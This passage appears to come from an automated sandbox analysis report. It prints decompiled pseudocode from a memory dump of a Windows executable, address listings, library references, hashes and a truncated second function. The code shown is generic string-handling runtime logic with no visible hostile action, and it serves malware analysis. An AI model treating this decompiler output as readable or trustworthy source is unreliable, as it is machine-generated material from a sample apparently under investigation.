																										__eflags = _t383;
																										if(_t383 == 0) {
																											goto L94;
																										} else {
																											L82:
																											__eflags =  *((intOrPtr*)(_t421 + 0x14)) - 0x10;
																											if( *((intOrPtr*)(_t421 + 0x14)) < 0x10) {
																												_t372 = _t421;
																											} else {
																												_t372 =  *_t421;
																											}
																											__eflags = _t459;
																											if(_t459 != 0) {
																												__eflags =  *(_t421 + 0x10) + _t372;
																												E004170E0( *(_t421 + 0x10) + _t372, _t314, _t459);
																											}
																											__eflags =  *((intOrPtr*)(_t421 + 0x14)) - 0x10;
																											 *(_t421 + 0x10) = _t383;
																											if( *((intOrPtr*)(_t421 + 0x14)) < 0x10) {
																												 *((char*)(_t421 + _t383)) = 0;
																												goto L94;
																											} else {
																												 *((char*)( *_t421 + _t383)) = 0;
																												return _t421;
																											}
																										}
																									}
																								}
																							}
																						}
																					} else {
																						_t374 =  *((intOrPtr*)(_t421 + 0x14));
																						__eflags = _t374 - 0x10;
																						if(_t374 < 0x10) {
																							_t273 = _t421;
																						} else {
																							_t273 =  *_t421;
																						}
																						__eflags = _t314 - _t273;
																						if(_t314 < _t273) {
																							goto L77;
																						} else {
																							__eflags = _t374 - 0x10;
																							if(_t374 < 0x10) {
																								_t382 = _t421;
																							} else {
																								_t382 =  *_t421;
																							}
																							__eflags =  *(_t421 + 0x10) + _t382 - _t314;
																							if( *(_t421 + 0x10) + _t382 <= _t314) {
																								goto L77;
																							} else {
																								__eflags = _t374 - 0x10;
																								if(_t374 < 0x10) {
																									_push(_v28);
																									_t276 = _t421;
																									_t336 = _t314 - _t276;
																									__eflags = _t336;
																									_push(_t336);
																									_push(_t421);
																									L26();
																									return _t276;
																								} else {
																									_push(_v28);
																									_t277 =  *_t421;
																									_t338 = _t314 - _t277;
																									__eflags = _t338;
																									_push(_t338);
																									_push(_t421);
																									L26();
																									return _t277;
																								}
																							}
																						}
																					}
																				} else {
																					__eflags =  *((intOrPtr*)(_t420 + 0x14)) - _t383;
																					if( *((intOrPtr*)(_t420 + 0x14)) >= _t383) {
																						__eflags = _t383;
																						if(_t383 != 0) {
																							goto L55;
																						} else {
																							 *(_t420 + 0x10) = _t383;
																							__eflags =  *((intOrPtr*)(_t420 + 0x14)) - 0x10;
																							if( *((intOrPtr*)(_t420 + 0x14)) < 0x10) {
																								_t283 = _t420;
																								 *_t283 = 0;
																								return _t283;
																							} else {
																								 *((char*)( *_t420)) = 0;
																								return _t420;
																							}
																						}
																					} else {
																						E004077E0(_t420, _t383, _t349);
																						__eflags = _t383;
																						if(_t383 == 0) {
																							goto L62;
																						} else {
																							L55:
																							E004072A0(_t420,  *(_t420 + 0x10), _t313, _v12);
																							__eflags =  *((intOrPtr*)(_t420 + 0x14)) - 0x10;
																							 *(_t420 + 0x10) = _t383;
																							if( *((intOrPtr*)(_t420 + 0x14)) < 0x10) {
																								 *((char*)(_t420 + _t383)) = 0;
																								goto L62;
																							} else {
																								 *((char*)( *_t420 + _t383)) = 0;
																								return _t420;
																							}
																						}
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *((intOrPtr*)(_t419 + 0x14)) - _t383;
																		if( *((intOrPtr*)(_t419 + 0x14)) >= _t383) {
																			__eflags = _t383;
																			if(_t383 != 0) {
																				goto L32;
																			} else {
																				 *(_t419 + 0x10) = _t383;
																				__eflags =  *((intOrPtr*)(_t419 + 0x14)) - 0x10;
																				if( *((intOrPtr*)(_t419 + 0x14)) < 0x10) {
																					_t298 = _t419;
																					 *_t298 = 0;
																					return _t298;
																				} else {
																					 *( *_t419) = 0;
																					return _t419;
																				}
																			}
																		} else {
																			E004077E0(_t419, _t383, _t348);
																			_t382 = _v0;
																			__eflags = _t383;
																			if(_t383 == 0) {
																				goto L46;
																			} else {
																				L32:
																				__eflags =  *((intOrPtr*)(_t312 + 0x14)) - 0x10;
																				if( *((intOrPtr*)(_t312 + 0x14)) >= 0x10) {
																					_t312 =  *_t312;
																				}
																				__eflags =  *((intOrPtr*)(_t419 + 0x14)) - 0x10;
																				if( *((intOrPtr*)(_t419 + 0x14)) < 0x10) {
																					_t379 = _t419;
																				} else {
																					_t379 =  *_t419;
																				}
																				__eflags = _t458;
																				if(_t458 != 0) {
																					__eflags =  *(_t419 + 0x10) + _t379;
																					E004170E0( *(_t419 + 0x10) + _t379, _t312 + _t382, _t458);
																				}
																				__eflags =  *((intOrPtr*)(_t419 + 0x14)) - 0x10;
																				 *(_t419 + 0x10) = _t383;
																				if( *((intOrPtr*)(_t419 + 0x14)) < 0x10) {
																					 *((char*)(_t419 + _t383)) = 0;
																					goto L46;
																				} else {
																					 *((char*)( *_t419 + _t383)) = 0;
																					return _t419;
																				}
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t9 = _t348 + 0x23; // 0x23
														_t306 = _t9 & 0xffffffe0;
														__eflags = _t306;
														 *(_t306 - 4) = _t348;
														return _t306;
													}
												}
											}
										}
									} else {
										L14:
										return _t164;
									}
								} else {
									_t3 = _t348 + 0x23; // 0x23
									_t310 = _t3 & 0xffffffe0;
									__eflags = _t310;
									 *(_t310 - 4) = _t348;
									return _t310;
								}
							}
						}
					}
				} else {
					L1:
					return _t159;
				}
				L205:
			}

0x0040c800
0x0040c800
0x0040c800
0x0040c800
0x0040c806
0x0040c80b
0x0040c810
0x0040c84d
0x00000000
0x0040c812
0x0040c812
0x0040c815
0x0040c81a
0x0040c83f
0x0040c844
0x0040c847
0x0040c849
0x00000000
0x0040c84b
0x00000000
0x0040c84b
0x0040c81c
0x0040c81c
0x0040c81f
0x0040c821
0x0040c852
0x0040c852
0x00000000
0x0040c823
0x0040c824
0x0040c829
0x0040c82b
0x0040c82e
0x0040c830
0x0040c857
0x0040c857
0x0040c85c
0x0040c85c
0x0040c861
0x0040c862
0x0040c863
0x0040c864
0x0040c865
0x0040c866
0x0040c867
0x0040c868
0x0040c869
0x0040c86a
0x0040c86b
0x0040c86c
0x0040c86d
0x0040c86e
0x0040c86f
0x0040c870
0x0040c874
0x0040c876
0x0040c87b
0x0040c880
0x0040c8c0
0x00000000
0x0040c882
0x0040c885
0x0040c888
0x0040c88d
0x0040c8b2
0x0040c8b7
0x0040c8ba
0x0040c8bc
0x00000000
0x0040c8be
0x00000000
0x0040c8be
0x0040c88f
0x0040c88f
0x0040c892
0x0040c894
0x0040c8c5
0x0040c8c5
0x00000000
0x0040c896
0x0040c89c
0x0040c89e
0x0040c8a1
0x0040c8a3
0x0040c8ca
0x0040c8ca
0x0040c8cf
0x0040c8cf
0x0040c8d4
0x0040c8d5
0x0040c8d6
0x0040c8d7
0x0040c8d8
0x0040c8d9
0x0040c8da
0x0040c8db
0x0040c8dc
0x0040c8dd
0x0040c8de
0x0040c8df
0x0040c8e0
0x0040c8e4
0x0040c8e5
0x0040c8ea
0x0040c8ec
0x0040c8ef
0x0040c8f1
0x0040c9b6
0x0040c9bb
0x00000000
0x0040c8f7
0x0040c8f7
0x0040c8fa
0x0040c8fc
0x0040c8fd
0x0040c901
0x0040c903
0x0040c90a
0x0040c90c
0x0040c9c0
0x0040c9c0
0x0040c9c5
0x00000000
0x0040c912
0x0040c912
0x0040c913
0x0040c916
0x0040c918
0x0040c9ad
0x0040c9b3
0x0040c91e
0x0040c91e
0x0040c921
0x0040c9ca
0x0040c9ca
0x0040c9cf
0x0040c9d4
0x0040c9d5
0x0040c9d6
0x0040c9d7
0x0040c9d8
0x0040c9d9
0x0040c9da
0x0040c9db
0x0040c9dc
0x0040c9dd
0x0040c9de
0x0040c9df
0x0040c9e0
0x0040c9e1
0x0040c9e5
0x0040c9e6
0x0040c9e8
0x0040c9ef
0x0040c9f1
0x0040ca6b
0x0040ca70
0x00000000
0x0040c9f3
0x0040c9f3
0x0040c9f4
0x0040c9f7
0x0040c9f9
0x0040ca63
0x0040ca68
0x0040c9fb
0x0040c9fb
0x0040c9fe
0x0040ca75
0x0040ca75
0x0040ca7a
0x0040ca7f
0x0040ca80
0x0040ca81
0x0040ca85
0x0040ca86
0x0040ca88
0x0040ca8a
0x0040cae3
0x0040cae3
0x0040cae8
0x0040cae9
0x0040caef
0x0040caf1
0x0040cb8c
0x0040cb91
0x00000000
0x0040caf7
0x0040caf7
0x0040caf8
0x0040cafb
0x0040cafd
0x0040cb83
0x0040cb89
0x0040cb03
0x0040cb03
0x0040cb06
0x0040cb96
0x0040cb96
0x0040cb9b
0x0040cba0
0x0040cba1
0x0040cba2
0x0040cba3
0x0040cba4
0x0040cba5
0x0040cba6
0x0040cba7
0x0040cba8
0x0040cba9
0x0040cbaa
0x0040cbab
0x0040cbac
0x0040cbad
0x0040cbae
0x0040cbaf
0x0040cbb0
0x0040cbb1
0x0040cbb5
0x0040cbb6
0x0040cbba
0x0040cbbb
0x0040cbbe
0x0040cbc0
0x0040cbc2
0x0040cc95
0x0040cc9a
0x00000000
0x0040cbc8
0x0040cbc8
0x0040cbca
0x0040cbcb
0x0040cbcf
0x0040cbd1
0x0040cbd4
0x0040cbd6
0x0040cc06
0x0040cc09
0x00000000
0x0040cc0f
0x0040cc0f
0x0040cc12
0x0040cc33
0x0040cc35
0x00000000
0x0040cc37
0x0040cc37
0x0040cc3b
0x0040cc3e
0x0040cc4f
0x0040cc54
0x0040cc57
0x0040cc40
0x0040cc43
0x0040cc4b
0x0040cc4b
0x0040cc3e
0x0040cc14
0x0040cc18
0x0040cc1d
0x0040cc1f
0x0040cc8c
0x0040cc92
0x0040cc21
0x0040cc21
0x0040cc21
0x0040cc25
0x0040cc27
0x0040cc27
0x0040cc29
0x0040cc2d
0x0040cc5a
0x0040cc2f
0x0040cc2f
0x0040cc2f
0x0040cc5c
0x0040cc5e
0x0040cc66
0x0040cc6b
0x0040cc6e
0x0040cc72
0x0040cc75
0x0040cc88
0x00000000
0x0040cc77
0x0040cc79
0x0040cc83
0x0040cc83
0x0040cc75
0x0040cc1f
0x0040cc12
0x0040cbd8
0x0040cbd8
0x0040cbdb
0x0040cbde
0x0040cc9f
0x0040cc9f
0x0040cca4
0x0040cca9
0x0040cca9
0x0040ccae
0x0040ccb3
0x0040ccb4
0x0040ccb5
0x0040ccb6
0x0040ccb7
0x0040ccb8
0x0040ccb9
0x0040ccba
0x0040ccbb
0x0040ccbc
0x0040ccbd
0x0040ccbe
0x0040ccbf
0x0040ccc0
0x0040ccc1
0x0040ccc2
0x0040ccc6
0x0040ccc8
0x0040cccb
0x0040cd6d
0x0040cd72
0x00000000
0x0040ccd1
0x0040ccd1
0x0040ccd4
0x0040cd77
0x0040cd77
0x0040cd7c
0x0040cd81
0x0040cd82
0x0040cd83
0x0040cd84
0x0040cd85
0x0040cd86
0x0040cd87
0x0040cd88
0x0040cd89
0x0040cd8a
0x0040cd8b
0x0040cd8c
0x0040cd8d
0x0040cd8e
0x0040cd8f
0x0040cd90
0x0040cd91
0x0040cd95
0x0040cd96
0x0040cd98
0x0040cd9a
0x0040cdf3
0x0040cdf3
0x0040cdf4
0x0040cdf8
0x0040cdfb
0x0040ce76
0x0040ce7b
0x0040ce80
0x0040ce81
0x0040ce82
0x0040ce83
0x0040ce84
0x0040ce85
0x0040ce86
0x0040ce87
0x0040ce88
0x0040ce89
0x0040ce8a
0x0040ce8b
0x0040ce8c
0x0040ce8d
0x0040ce8e
0x0040ce8f
0x0040ce90
0x0040ce91
0x0040ce93
0x0040ce94
0x0040ce97
0x0040ce99
0x0040ce9b
0x0040ce9e
0x0040cea1
0x0040cea8
0x0040ceab
0x0040cf15
0x0040cf17
0x0040cead
0x0040cead
0x0040ceae
0x0040ceb0
0x0040ceb0
0x0040ceb0
0x0040ceb3
0x0040ceb3
0x0040ceb6
0x0040ceb8
0x0040cebb
0x00000000
0x0040cebd
0x0040cebd
0x0040cec0
0x0040cec5
0x0040cee1
0x0040cee2
0x0040cee7
0x00000000
0x0040cec7
0x0040cec7
0x0040ceca
0x0040cf18
0x0040cf18
0x0040cf1d
0x0040cf1e
0x0040cf1f
0x0040cf27
0x0040cf2a
0x0040cf30
0x0040cf30
0x0040cf32
0x0040cf4a
0x0040cf34
0x0040cf34
0x0040cf39
0x0040cf51
0x00000000
0x0040cf3b
0x0040cf3b
0x0040cf3e
0x0040cf56
0x0040cf56
0x0040cf5b
0x0040cf60
0x0040cf67
0x0040cf75
0x0040cf7e
0x00000000
0x0040cf40
0x0040cf40
0x0040cf43
0x0040cf83
0x0040cf83
0x0040cf88
0x0040cf8d
0x0040cf94
0x0040cfa2
0x0040cfab
0x00000000
0x0040cf45
0x0040cf43
0x0040cf3e
0x0040cfb0
0x0040cfb5
0x0040cfba
0x0040cfbd
0x0040cfc1
0x0040cfcf
0x0040cfd8
0x0040cfdd
0x0040cfde
0x0040cfdf
0x0040cfe0
0x0040cfe1
0x0040cfe3
0x0040cfe4
0x0040cfe8
0x0040cfee
0x0040cff3
0x0040cffa
0x0040cffc
0x0040d009
0x0040d00b
0x0040cfea
0x0040cfea
0x0040cfea
0x0040d011
0x0040d015
0x0040d018
0x0040d01e
0x0040d021
0x0040d027
0x0040d02d
0x0040d033
0x0040d036
0x0040d03a
0x0040d043
0x0040d04c
0x0040d055
0x0040d061
0x0040d06a
0x0040d070
0x0040d077
0x0040d07d
0x0040d080
0x0040d086
0x0040d089
0x0040d091
0x0040d091
0x0040cecc
0x0040cecc
0x0040cecf
0x0040ced1
0x00000000
0x0040ced3
0x0040ced3
0x0040ced5
0x0040ced8
0x00000000
0x0040ceda
0x0040ceda
0x0040cedd
0x00000000
0x0040cedf
0x0040cedf
0x00000000
0x0040cedf
0x0040cedd
0x0040ced8
0x0040ced1
0x0040ceca
0x0040cec5
0x00000000
0x0040ceea
0x0040ceea
0x0040cef1
0x0040cef5
0x0040cefc
0x0040cefe
0x0040cefe
0x0040cf01
0x0040cf04
0x0040cf09
0x0040cf0c
0x0040cf0e
0x0040cf0e
0x00000000
0x0040cf14
0x0040cdfd
0x0040cdfd
0x0040ce00
0x0040ce1b
0x0040ce1d
0x00000000
0x0040ce1f
0x0040ce1f
0x0040ce23
0x0040ce26
0x0040ce35
0x0040ce3a
0x0040ce3d
0x0040ce28
0x0040ce2b
0x0040ce32
0x0040ce32
0x0040ce26
0x0040ce02
0x0040ce08
0x0040ce0d
0x0040ce0f
0x0040ce6e
0x0040ce73
0x0040ce11
0x0040ce11
0x0040ce11
0x0040ce15
0x0040ce40
0x0040ce17
0x0040ce17
0x0040ce17
0x0040ce42
0x0040ce44
0x0040ce49
0x0040ce4e
0x0040ce51
0x0040ce55
0x0040ce58
0x0040ce6a
0x00000000
0x0040ce5a
0x0040ce5c
0x0040ce65
0x0040ce65
0x0040ce58
0x0040ce0f
0x0040ce00
0x0040cd9c
0x0040cd9c
0x0040cd9f
0x0040cda2
0x0040cda8
0x0040cda4
0x0040cda4
0x0040cda4
0x0040cdaa
0x0040cdac
0x00000000
0x0040cdae
0x0040cdae
0x0040cdb1
0x0040cdb7
0x0040cdb3
0x0040cdb3
0x0040cdb3
0x0040cdbe
0x0040cdc0
0x00000000
0x0040cdc2
0x0040cdc2
0x0040cdc5
0x0040cddd
0x0040cde1
0x0040cde5
0x0040cde5
0x0040cde7
0x0040cde8
0x0040cde9
0x0040cdf0
0x0040cdc7
0x0040cdc7
0x0040cdcb
0x0040cdcf
0x0040cdcf
0x0040cdd1
0x0040cdd2
0x0040cdd3
0x0040cdda
0x0040cdda
0x0040cdc5
0x0040cdc0
0x0040cdac
0x0040ccda
0x0040ccda
0x0040ccdd
0x0040cd01
0x0040cd03
0x00000000
0x0040cd05
0x0040cd05
0x0040cd09
0x0040cd0c
0x0040cd1a
0x0040cd1e
0x0040cd21
0x0040cd0e
0x0040cd11
0x0040cd17
0x0040cd17
0x0040cd0c
0x0040ccdf
0x0040cce3
0x0040cce8
0x0040ccea
0x0040cd66
0x0040cd6a
0x0040ccec
0x0040ccec
0x0040ccec
0x0040ccef
0x0040cd2e
0x0040cd32
0x0040cd38
0x0040cd34
0x0040cd34
0x0040cd34
0x0040cd42
0x0040ccf1
0x0040ccf1
0x0040ccf5
0x0040cd2a
0x0040ccf7
0x0040ccfd
0x0040ccfd
0x0040ccf5
0x0040cd4a
0x0040cd4e
0x0040cd51
0x0040cd62
0x00000000
0x0040cd53
0x0040cd55
0x0040cd5d
0x0040cd5d
0x0040cd51
0x0040ccea
0x0040ccdd
0x0040ccd4
0x0040cbe4
0x0040cbe4
0x0040cbe7
0x0040cbeb
0x0040cbed
0x0040cbed
0x0040cbf0
0x0040cbf8
0x0040cc03
0x0040cc03
0x0040cbde
0x0040cbd6
0x0040cb0c
0x0040cb0c
0x0040cb0f
0x0040cb28
0x0040cb2a
0x00000000
0x0040cb2c
0x0040cb2c
0x0040cb2f
0x0040cb33
0x0040cb44
0x0040cb49
0x0040cb4c
0x0040cb35
0x0040cb39
0x0040cb40
0x0040cb40
0x0040cb33
0x0040cb11
0x0040cb15
0x0040cb1a
0x0040cb1c
0x00000000
0x0040cb1e
0x0040cb1e
0x0040cb1e
0x0040cb22
0x0040cb4f
0x0040cb24
0x0040cb24
0x0040cb24
0x0040cb51
0x0040cb53
0x0040cb59
0x0040cb5d
0x0040cb62
0x0040cb65
0x0040cb69
0x0040cb6c
0x0040cb7f
0x00000000
0x0040cb6e
0x0040cb70
0x0040cb7a
0x0040cb7a
0x0040cb6c
0x0040cb1c
0x0040cb0f
0x0040cb06
0x0040cafd
0x0040ca8c
0x0040ca8c
0x0040ca8f
0x0040ca92
0x0040ca98
0x0040ca94
0x0040ca94
0x0040ca94
0x0040ca9a
0x0040ca9c
0x00000000
0x0040ca9e
0x0040ca9e
0x0040caa1
0x0040caa7
0x0040caa3
0x0040caa3
0x0040caa3
0x0040caae
0x0040cab0
0x00000000
0x0040cab2
0x0040cab2
0x0040cab5
0x0040cacd
0x0040cad1
0x0040cad5
0x0040cad5
0x0040cad7
0x0040cad8
0x0040cad9
0x0040cae0
0x0040cab7
0x0040cab7
0x0040cabb
0x0040cabf
0x0040cabf
0x0040cac1
0x0040cac2
0x0040cac3
0x0040caca
0x0040caca
0x0040cab5
0x0040cab0
0x0040ca9c
0x0040ca00
0x0040ca00
0x0040ca03
0x0040ca38
0x0040ca3a
0x00000000
0x0040ca3c
0x0040ca3c
0x0040ca3f
0x0040ca43
0x0040ca52
0x0040ca57
0x0040ca5a
0x0040ca45
0x0040ca48
0x0040ca4f
0x0040ca4f
0x0040ca43
0x0040ca05
0x0040ca09
0x0040ca0e
0x0040ca10
0x00000000
0x0040ca12
0x0040ca12
0x0040ca1c
0x0040ca21
0x0040ca25
0x0040ca28
0x0040ca5f
0x00000000
0x0040ca2a
0x0040ca2c
0x0040ca35
0x0040ca35
0x0040ca28
0x0040ca10
0x0040ca03
0x0040c9fe
0x0040c9f9
0x0040c927
0x0040c927
0x0040c92a
0x0040c94f
0x0040c951
0x00000000
0x0040c953
0x0040c953
0x0040c956
0x0040c95a
0x0040c96b
0x0040c970
0x0040c973
0x0040c95c
0x0040c960
0x0040c967
0x0040c967
0x0040c95a
0x0040c92c
0x0040c930
0x0040c935
0x0040c939
0x0040c93b
0x00000000
0x0040c93d
0x0040c93d
0x0040c93d
0x0040c941
0x0040c943
0x0040c943
0x0040c945
0x0040c949
0x0040c976
0x0040c94b
0x0040c94b
0x0040c94b
0x0040c978
0x0040c97a
0x0040c984
0x0040c987
0x0040c98c
0x0040c98f
0x0040c993
0x0040c996
0x0040c9a9
0x00000000
0x0040c998
0x0040c99a
0x0040c9a4
0x0040c9a4
0x0040c996
0x0040c93b
0x0040c92a
0x0040c921
0x0040c918
0x0040c90c
0x0040c8a5
0x0040c8a5
0x0040c8a8
0x0040c8a8
0x0040c8ab
0x0040c8ae
0x0040c8ae
0x0040c8a3
0x0040c894
0x0040c88d
0x0040c878
0x0040c878
0x0040c878
0x0040c878
0x0040c832
0x0040c832
0x0040c835
0x0040c835
0x0040c838
0x0040c83b
0x0040c83b
0x0040c830
0x0040c821
0x0040c81a
0x0040c808
0x0040c808
0x0040c808
0x0040c808
0x00000000

APIs

new.LIBCMT ref: 0040C824
new.LIBCMT ref: 0040C83F

Part of subcall function 0041500C: Concurrency::cancel_current_task.LIBCPMT ref: 0041502B

Concurrency::cancel_current_task.LIBCPMT ref: 0040C84D

Part of subcall function 00415C7B: __CxxThrowException@8.LIBVCRUNTIME ref: 00415C92

Concurrency::cancel_current_task.LIBCPMT ref: 0040C852

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Concurrency::cancel_current_task$Exception@8Throw
String ID:
API String ID: 3339364867-0
Opcode ID: 4e469076ff19a39123aa0f56fdfb2c76168971b4a2b3a1dc1e76a478099a5e58
Instruction ID: 27344c12b2101f7c3e080cb824f82c57b50db9a006f162cc76f4e07686d24487
Opcode Fuzzy Hash: 4e469076ff19a39123aa0f56fdfb2c76168971b4a2b3a1dc1e76a478099a5e58
Instruction Fuzzy Hash: D2F082B2501700C6DA28B771C4825EF72445E9435EB20873FA516D56D1F67CC89581EE

Uniqueness

Uniqueness Score: 2.84%

Function 004021C5, Relevance: 4.7, APIs: 2, Instructions: 1746
UNIQUE

Download Yara Rule

C-Code - Quality: 86%

			E004021C5() {
				intOrPtr _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				char _v28;
				intOrPtr _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				char _v52;
				intOrPtr _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				intOrPtr _v82;
				short _v84;
				short _v86;
				short _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				char _v100;
				intOrPtr _v106;
				short _v108;
				short _v110;
				short _v112;
				short _v114;
				short _v116;
				short _v118;
				short _v120;
				short _v122;
				char _v124;
				intOrPtr _v130;
				short _v132;
				short _v134;
				short _v136;
				short _v138;
				short _v140;
				short _v142;
				short _v144;
				short _v146;
				char _v148;
				intOrPtr _v152;
				short _v154;
				short _v156;
				short _v158;
				short _v160;
				short _v162;
				short _v164;
				short _v166;
				short _v168;
				short _v170;
				char _v172;
				intOrPtr _v176;
				short _v178;
				short _v180;
				short _v182;
				short _v184;
				short _v186;
				short _v188;
				short _v190;
				short _v192;
				short _v194;
				char _v196;
				intOrPtr _v200;
				short _v202;
				short _v204;
				short _v206;
				short _v208;
				short _v210;
				short _v212;
				short _v214;
				short _v216;
				short _v218;
				char _v220;
				intOrPtr _v224;
				short _v226;
				short _v228;
				short _v230;
				short _v232;
				short _v234;
				short _v236;
				short _v238;
				short _v240;
				short _v242;
				char _v244;
				intOrPtr _v248;
				short _v250;
				short _v252;
				short _v254;
				short _v256;
				short _v258;
				short _v260;
				short _v262;
				short _v264;
				short _v266;
				char _v268;
				intOrPtr _v274;
				short _v276;
				short _v278;
				short _v280;
				short _v282;
				short _v284;
				short _v286;
				short _v288;
				short _v290;
				short _v292;
				short _v294;
				char _v296;
				intOrPtr _v302;
				short _v304;
				short _v306;
				short _v308;
				short _v310;
				short _v312;
				short _v314;
				short _v316;
				short _v318;
				short _v320;
				short _v322;
				char _v324;
				intOrPtr _v330;
				short _v332;
				short _v334;
				short _v336;
				short _v338;
				short _v340;
				short _v342;
				short _v344;
				short _v346;
				short _v348;
				short _v350;
				char _v352;
				intOrPtr _v358;
				short _v360;
				short _v362;
				short _v364;
				short _v366;
				short _v368;
				short _v370;
				short _v372;
				short _v374;
				short _v376;
				short _v378;
				char _v380;
				intOrPtr _v386;
				short _v388;
				short _v390;
				short _v392;
				short _v394;
				short _v396;
				short _v398;
				short _v400;
				short _v402;
				short _v404;
				short _v406;
				char _v408;
				intOrPtr _v414;
				short _v416;
				short _v418;
				short _v420;
				short _v422;
				short _v424;
				short _v426;
				short _v428;
				short _v430;
				short _v432;
				short _v434;
				char _v436;
				intOrPtr _v440;
				short _v442;
				short _v444;
				short _v446;
				short _v448;
				short _v450;
				short _v452;
				short _v454;
				short _v456;
				short _v458;
				short _v460;
				short _v462;
				char _v464;
				int _v468;
				short _v470;
				short _v472;
				short _v474;
				short _v476;
				short _v478;
				short _v480;
				short _v482;
				short _v484;
				short _v486;
				short _v488;
				short _v490;
				char _v492;
				intOrPtr _v496;
				short _v498;
				short _v500;
				short _v502;
				short _v504;
				short _v506;
				short _v508;
				short _v510;
				short _v512;
				short _v514;
				short _v516;
				short _v518;
				char _v520;
				intOrPtr _v524;
				short _v526;
				short _v528;
				short _v530;
				short _v532;
				short _v534;
				short _v536;
				short _v538;
				short _v540;
				short _v542;
				short _v544;
				short _v546;
				char _v548;
				intOrPtr _v552;
				short _v554;
				short _v556;
				short _v558;
				short _v560;
				short _v562;
				short _v564;
				short _v566;
				short _v568;
				short _v570;
				short _v572;
				short _v574;
				char _v576;
				intOrPtr _v580;
				short _v582;
				short _v584;
				short _v586;
				short _v588;
				short _v590;
				short _v592;
				short _v594;
				short _v596;
				short _v598;
				short _v600;
				short _v602;
				char _v604;
				intOrPtr _v608;
				short _v610;
				short _v612;
				short _v614;
				short _v616;
				short _v618;
				short _v620;
				short _v622;
				short _v624;
				short _v626;
				short _v628;
				short _v630;
				char _v632;
				intOrPtr _v636;
				short _v638;
				short _v640;
				short _v642;
				short _v644;
				short _v646;
				short _v648;
				short _v650;
				short _v652;
				short _v654;
				short _v656;
				short _v658;
				char _v660;
				intOrPtr _v666;
				short _v668;
				short _v670;
				short _v672;
				short _v674;
				short _v676;
				short _v678;
				short _v680;
				short _v682;
				short _v684;
				short _v686;
				short _v688;
				short _v690;
				char _v692;
				intOrPtr _v698;
				short _v700;
				short _v702;
				short _v704;
				short _v706;
				short _v708;
				short _v710;
				short _v712;
				short _v714;
				short _v716;
				short _v718;
				short _v720;
				short _v722;
				char _v724;
				intOrPtr _v730;
				short _v732;
				short _v734;
				short _v736;
				short _v738;
				short _v740;
				short _v742;
				short _v744;
				short _v746;
				short _v748;
				short _v750;
				short _v752;
				short _v754;
				char _v756;
				char _v764;
				intOrPtr _v768;
				short _v770;
				short _v772;
				short _v774;
				short _v776;
				short _v778;
				short _v780;
				short _v782;
				short _v784;
				short _v786;
				short _v788;
				short _v790;
				short _v792;
				short _v794;
				char _v796;
				intOrPtr _v800;
				short _v802;
				short _v804;
				short _v806;
				short _v808;
				short _v810;
				short _v812;
				short _v814;
				short _v816;
				short _v818;
				short _v820;
				short _v822;
				short _v824;
				short _v826;
				char _v828;
				intOrPtr _v832;
				short _v834;
				short _v836;
				short _v838;
				short _v840;
				short _v842;
				short _v844;
				short _v846;
				short _v848;
				short _v850;
				short _v852;
				short _v854;
				short _v856;
				short _v858;
				char _v860;
				intOrPtr _v866;
				short _v868;
				short _v870;
				short _v872;
				short _v874;
				short _v876;
				short _v878;
				short _v880;
				short _v882;
				short _v884;
				short _v886;
				short _v888;
				short _v890;
				short _v892;
				short _v894;
				char _v896;
				intOrPtr _v902;
				short _v904;
				short _v906;
				short _v908;
				short _v910;
				short _v912;
				short _v914;
				short _v916;
				short _v918;
				short _v920;
				short _v922;
				short _v924;
				short _v926;
				short _v928;
				short _v930;
				char _v932;
				intOrPtr _v938;
				short _v940;
				short _v942;
				short _v944;
				short _v946;
				short _v948;
				short _v950;
				short _v952;
				short _v954;
				short _v956;
				short _v958;
				short _v960;
				short _v962;
				short _v964;
				short _v966;
				char _v968;
				intOrPtr _v972;
				short _v974;
				short _v976;
				short _v978;
				short _v980;
				short _v982;
				short _v984;
				short _v986;
				short _v988;
				short _v990;
				short _v992;
				short _v994;
				short _v996;
				short _v998;
				short _v1000;
				short _v1002;
				char _v1004;
				intOrPtr _v1010;
				short _v1012;
				short _v1014;
				short _v1016;
				short _v1018;
				short _v1020;
				short _v1022;
				short _v1024;
				short _v1026;
				short _v1028;
				short _v1030;
				short _v1032;
				short _v1034;
				short _v1036;
				short _v1038;
				short _v1040;
				short _v1042;
				char _v1044;
				intOrPtr _v1048;
				short _v1050;
				short _v1052;
				short _v1054;
				short _v1056;
				short _v1058;
				short _v1060;
				short _v1062;
				short _v1064;
				short _v1066;
				short _v1068;
				short _v1070;
				short _v1072;
				short _v1074;
				short _v1076;
				short _v1078;
				short _v1080;
				short _v1082;
				char _v1084;
				intOrPtr _v1088;
				short _v1090;
				short _v1092;
				short _v1094;
				short _v1096;
				short _v1098;
				short _v1100;
				short _v1102;
				short _v1104;
				short _v1106;
				short _v1108;
				short _v1110;
				short _v1112;
				short _v1114;
				short _v1116;
				short _v1118;
				short _v1120;
				short _v1122;
				short _v1124;
				short _v1126;
				char _v1128;
				char* _v1132;
				char* _v1136;
				char* _v1140;
				char* _v1144;
				char* _v1148;
				char* _v1152;
				char* _v1156;
				char* _v1160;
				char* _v1164;
				char* _v1168;
				char* _v1172;
				char* _v1176;
				char* _v1180;
				char* _v1184;
				char* _v1188;
				char* _v1192;
				char* _v1196;
				char* _v1200;
				char* _v1204;
				char* _v1208;
				char* _v1212;
				char* _v1216;
				char* _v1220;
				char* _v1224;
				char* _v1228;
				char* _v1232;
				char* _v1236;
				char* _v1240;
				char* _v1244;
				char* _v1248;
				char* _v1252;
				char* _v1256;
				char* _v1260;
				char* _v1264;
				char* _v1268;
				char* _v1272;
				char* _v1276;
				char* _v1280;
				void* __ebx;
				short _t701;
